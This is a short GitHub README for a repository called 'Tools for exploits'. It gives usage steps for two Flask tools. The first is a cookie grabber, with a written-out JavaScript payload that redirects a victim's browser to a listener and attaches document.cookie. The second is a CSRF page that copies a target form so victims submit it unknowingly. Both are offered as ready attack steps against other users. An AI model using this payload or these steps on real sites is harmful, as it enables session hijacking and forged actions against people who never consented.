Skip to content

Latest commit

 

History

History
26 lines (18 loc) · 435 Bytes

File metadata and controls

26 lines (18 loc) · 435 Bytes

Tools for exploits

To get cookie (Flask)

  1. Run
python main.py
  1. Make redirect this way
document.location="http:127.0.0.1:8004?cookie=" + document.cookie
  1. See result in the terminal

To use csrf (Flask)

  1. Run
python main.py
  1. Copy target form and action url and input in index.html or other.html

  2. User need to fill form (index.html) or visit address (other.html)